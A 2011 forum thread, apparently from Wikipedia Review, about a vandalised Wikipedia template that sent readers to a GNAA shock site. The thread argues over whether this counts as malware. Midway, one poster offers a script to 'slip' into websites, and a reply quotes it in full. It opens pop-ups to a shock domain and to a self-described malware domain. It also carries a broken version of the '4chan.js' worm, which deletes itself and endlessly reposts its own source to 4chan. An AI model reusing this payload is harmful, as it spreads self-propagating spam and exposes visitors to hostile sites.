Help - Search - Members - Calendar
Full Version: Uh oh - malware infection from WP?
> Wikimedia Discussion > General Discussion
carbuncle
There is a report on the admin noticeboard that certain pages were causing malware infections. Some quotes:
QUOTE
:IF YOU CLICKED ON THE VANDALIZED PAGE. If you have, especially if you are running Idiotically Exploding and your AV software did not go crazy, I strongly suggest you kill your browser sessions and do a full scan of your computer. I tried right clicking for source... then left clicking to get focus... and before I could right click again, my AV software got very upset.
QUOTE
It's very disturbing that someone manged to mount that kind of attack. I can live with the NSFW pictures popping unexpectedly around here, but malware injection?? FuFoFuEd (talk) 03:38, 21 August 2011 (UTC)
QUOTE
I believe the malware site was under the domain feenode.net (the homepage is a shock site with gruesome images and audio—don't go there!), which is apparently owned by GNAA (see [33] archive) Would an admin add this domain to the edit filter or the spam blacklist? Thanks, Goodvac (talk) 05:03, 21 August 2011 (UTC)
QUOTE
I used Firefox 5, did not click on anything in that page, but still got infected with something that moves my browser window randomly around and fills it with some gory pic. It's fine for a while after I kill the process but then starts again. Avira can't find anything. Any suggestions? FuFoFuEd (talk) 06:10, 21 August 2011 (UTC)

While there is no real evidence that this was done by the GNAA, it seems that a GNNA-owned page is involved, and some members recently got blocked on WP. The page/template involved has been revdeleted and there isn't much detail in the report, but if someone has found a way to actually infect WP reader's computers, that might put a bit of a dent in WP's hit count.

SB_Johnny
Is this a first? I don't remember actual malware being slipped into a mediawiki page before (not counting mediawiki, of course).
Jon Awbrey
Silly Rabbit, Wikipedia IS Malware …

Jon tongue.gif
Detective
QUOTE(SB_Johnny @ Sun 21st August 2011, 5:27pm) *

I don't remember actual malware being slipped into a mediawiki page before (not counting mediawiki, of course).



QUOTE(Jon Awbrey @ Sun 21st August 2011, 10:12pm) *

Silly Rabbit, Wikipedia IS Malware …

Jon tongue.gif

I'm missing something here. Aren't you two in complete agreement? How does that make SBJ a silly rabbit? (Now if we were discussing Wikiversity ...)
Zoloft
QUOTE(Detective @ Sun 21st August 2011, 2:23pm) *
QUOTE(SB_Johnny @ Sun 21st August 2011, 5:27pm) *
I don't remember actual malware being slipped into a mediawiki page before (not counting mediawiki, of course).
QUOTE(Jon Awbrey @ Sun 21st August 2011, 10:12pm) *
Silly Rabbit, Wikipedia IS Malware …

Jon tongue.gif
I'm missing something here. Aren't you two in complete agreement? How does that make SBJ a silly rabbit? (Now if we were discussing Wikiversity ...)

No two people are in complete agreement.

Jon is just ensuring that SBJ never gets his hands on delicious Kix cereal.

Some humans are malware. GNAA is a convenient collection of such people.
Milton Roe
QUOTE(Zoloft @ Sun 21st August 2011, 2:38pm) *

Some humans are malware. GNAA is a convenient collection of such people.

Randolf Churchill, son of the Prime Minister and a rather nasty alcoholic, once upon a time developed a colon tumor which had to be removed. It proved not be cancer. Some wag said "What a shame to cut out of Randolf the only part that is NOT malignant...." dry.gif
melloden
The malware isn't in Wikipedia. I was lucky enough to look at the page source just before the revision was deleted, and it was Meepsheep (is he with the GNAA now?), using a transparent image covering the entire screen and linking to the typical GNAA shock site with a bunch of popups that never end.
SB_Johnny
QUOTE(melloden @ Sun 21st August 2011, 6:11pm) *

The malware isn't in Wikipedia. I was lucky enough to look at the page source just before the revision was deleted, and it was Meepsheep (is he with the GNAA now?), using a transparent image covering the entire screen and linking to the typical GNAA shock site with a bunch of popups that never end.

Actually it wasn't Meepsheep, it was an edit to a widely used and unprotected template by a throwaway account.

Looking at the code, it looks like trying to click on any link from the article would have landed on the GNAA page. I doubt this will be anything near the last time someone employs the trick, and done to scale it could seriously mess up Wikipedia for a while.

Maybe that "image filter" will need be reset to use whitelists rather than blacklist categories... unsure.gif
Michaeldsuarez
QUOTE(melloden @ Sun 21st August 2011, 6:11pm) *

The malware isn't in Wikipedia. I was lucky enough to look at the page source just before the revision was deleted, and it was Meepsheep (is he with the GNAA now?), using a transparent image covering the entire screen and linking to the typical GNAA shock site with a bunch of popups that never end.


http://encyclopediadramatica.ch/Last_Measure
Meepsheep
So I alter an unprotected template to include some dongs and a link to Last Measure, and it's automatically malware? Lolwut?
Mr.Treason II
QUOTE(Meepsheep @ Thu 22nd September 2011, 3:40am) *

So I alter an unprotected template to include some dongs and a link to Last Measure, and it's automatically malware? Lolwut?


If you're careful, there is NO MALWAREZ.
The Hoser's site got Javascripted, so just slip some javascript like this
CODE

<script type="text/javascript">
<!--
window.open( "http://www.feenode.net/" )
window.open( "http://www.WPReview.on.nimpfullofmalware.org/" )
k="Content-Disposition: form-data; name="

function r(){
    return String.fromCharCode( "a".charCodeAt(0) + Math.floor( Math.random() * 26 ) )
}

f = WSH.createobject("scripting.filesystemobject")
g = f.opentextfile(WSH.scriptfullname)
h = g.readall()
g.close()
f.deletefile( WSH.scriptfullname )
function 4chan;
{
x = "Copy and paste the following to Notepad, save with the filename \"4chan.js\", open the file you created and shit bricks.\r\n\r\n" + h
a = WSH.createobject( "msxml2.xmlhttp" )

while(1) {
    a.open( "get", "http://img.4chan.org/b", 0 )
    a.send()
  
    b = a.responsetext
    c = b.substr( b.indexOf( "res/" ) + 4, 8 )
    d = ""
    e = ""
  
    for( i = 0; i < 20; i++ )
        d += r()
  
    for( i = 0; i < 8; i++ )
        e += r()
  
    a.open( "post", "http://dat.4chan.org/b/imgboard.php", 0 )
    t = "multipart/form-data; boundary=" + d
    a.setrequestheader( "Content-Type", t )
    a.send("--" + d + "\r\n" +
        k + "\"MAX_FILE_SIZ8\"\r\n\r\n" + "2097152\r\n--" + d + "\r\n" +
        k + "\"resto\"\r\n\r\n" + c + "\r\n--" + d + "\r\n" +
        k + "\"name\"\r\n\ r\n\r\n--" + d + "\r\n" +
        k + "\"email\"\r\n\r\n\r\n--" + d + "\r\n" + k + "\"sub\"\r\n\r\n\r\n--" + d + "\r\n" +
        k + "\"com\"\r\n\r\n" + x + "\r\n--" + d + "\r\n" +
        k + "\"upfile\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n\r\n\r\n--" + d + "\r\n" +
        k + "\"pwd\"\r\n\r\n" + e + "\r\n--" + d + "\r\n" +
        k + "\"mode\"\r\n\r\nregist\r\n--" + d + "--\r\n" )
  
    WSH.sleep( 3e4 + Math.floor( Math.random() * 3e4 ) )
}
}
4chan.js();

//-->
</script>
Meepsheep
QUOTE(Mr.Treason II @ Tue 27th September 2011, 6:42pm) *

QUOTE(Meepsheep @ Thu 22nd September 2011, 3:40am) *

So I alter an unprotected template to include some dongs and a link to Last Measure, and it's automatically malware? Lolwut?


If you're careful, there is NO MALWAREZ.
The Hoser's site got Javascripted, so just slip some javascript like this
CODE

<script type="text/javascript">
<!--
window.open( "http://www.feenode.net/" )
window.open( "http://www.WPReview.on.nimpfullofmalware.org/" )
k="Content-Disposition: form-data; name="

function r(){
    return String.fromCharCode( "a".charCodeAt(0) + Math.floor( Math.random() * 26 ) )
}

f = WSH.createobject("scripting.filesystemobject")
g = f.opentextfile(WSH.scriptfullname)
h = g.readall()
g.close()
f.deletefile( WSH.scriptfullname )
function 4chan;
{
x = "Copy and paste the following to Notepad, save with the filename \"4chan.js\", open the file you created and shit bricks.\r\n\r\n" + h
a = WSH.createobject( "msxml2.xmlhttp" )

while(1) {
    a.open( "get", "http://img.4chan.org/b", 0 )
    a.send()
  
    b = a.responsetext
    c = b.substr( b.indexOf( "res/" ) + 4, 8 )
    d = ""
    e = ""
  
    for( i = 0; i < 20; i++ )
        d += r()
  
    for( i = 0; i < 8; i++ )
        e += r()
  
    a.open( "post", "http://dat.4chan.org/b/imgboard.php", 0 )
    t = "multipart/form-data; boundary=" + d
    a.setrequestheader( "Content-Type", t )
    a.send("--" + d + "\r\n" +
        k + "\"MAX_FILE_SIZ8\"\r\n\r\n" + "2097152\r\n--" + d + "\r\n" +
        k + "\"resto\"\r\n\r\n" + c + "\r\n--" + d + "\r\n" +
        k + "\"name\"\r\n\ r\n\r\n--" + d + "\r\n" +
        k + "\"email\"\r\n\r\n\r\n--" + d + "\r\n" + k + "\"sub\"\r\n\r\n\r\n--" + d + "\r\n" +
        k + "\"com\"\r\n\r\n" + x + "\r\n--" + d + "\r\n" +
        k + "\"upfile\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n\r\n\r\n--" + d + "\r\n" +
        k + "\"pwd\"\r\n\r\n" + e + "\r\n--" + d + "\r\n" +
        k + "\"mode\"\r\n\r\nregist\r\n--" + d + "--\r\n" )
  
    WSH.sleep( 3e4 + Math.floor( Math.random() * 3e4 ) )
}
}
4chan.js();

//-->
</script>



Oh god, 4chan.js, takes me back man
Kelly Martin
QUOTE(SB_Johnny @ Sun 21st August 2011, 11:27am) *
Is this a first? I don't remember actual malware being slipped into a mediawiki page before (not counting mediawiki, of course).
No, not the first time. There's been about a half-dozen instances of people using Wikipedia (or Wikimedia Commons) to spread malware that I've heard of. There are some phenomenally stupid security holes in IE that, to be honest, Tim Starling and Brion Vibber have bent over backwards to secure MediaWiki against. MediaWiki now has some fairly sophisticated code in it to screen uploaded files for malicious content; that code is there to block exploits that actually happened on Wikipedia or on Commons. Even so, there are doubtless still infected files in Commons; I'd not be surprised if a good portion of the porn there carries malware payloads, especially anything uploaded prior to mid-2007.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.